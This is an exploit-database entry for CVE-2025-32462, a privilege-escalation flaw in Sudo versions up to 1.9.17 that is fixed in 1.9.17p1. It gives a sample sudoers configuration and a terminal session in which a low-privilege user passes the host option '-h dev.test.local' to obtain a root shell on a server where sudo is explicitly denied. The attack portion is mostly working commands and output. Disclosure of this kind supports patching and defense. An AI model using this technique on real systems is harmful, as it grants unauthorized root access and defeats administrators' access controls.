# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege # Date: 2025-06-30 # Exploit Author: Rich Mirch # Vendor Homepage: https://www.sudo.ws # Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz # Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32 # Fixed in: 1.9.17p1 # Vendor Advisory: https://www.sudo.ws/security/advisories/host_any # Blog: https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host # Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo 1.9.13p2 # CVE : CVE-2025-32462 # No exploit is required. Executing a sudo or sudoedit command with the host option referencing an unrelated remote host rule causes Sudo to treat the rule as valid for the local system. As a result, any command allowed by the remote host rule can be executed on the local machine. Example /etc/sudoers file using the Host_Alias directive. The lowpriv user is allowed to execute all commands (full root) on dev.test.local, ci.test.local, but not prod.test.local. Host_Alias SERVERS = prod.test.local, dev.test.local Host_Alias PROD = prod.test.local lowpriv SERVERS, !PROD = NOPASSWD:ALL lowpriv ci.test.local = NOPASSWD:ALL Even though the prod.test.local server is explicitly denied for the lowpriv user, root access is achieved by specifying the host option for the dev.test.local or ci.test.local servers. Example Show that lowpriv is not allowed to execute sudo on the prod server. lowpriv@prod:~$ id uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv) lowpriv@prod:~$ sudo -l [sudo] password for lowpriv: Sorry, user lowpriv may not run sudo on prod. List the host rules for the dev.test.local server. lowpriv@prod:~$ sudo -l -h dev.test.local Matching Defaults entries for lowpriv on dev: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User lowpriv may run the following commands on dev: (root) NOPASSWD: ALL Execute a root shell on prod.test.local by specifying the -h dev.test.local option. lowpriv@prod:~$ sudo -h dev.test.local -i sudo: a remote host may only be specified when listing privileges. root@prod:~# id uid=0(root) gid=0(root) groups=0(root)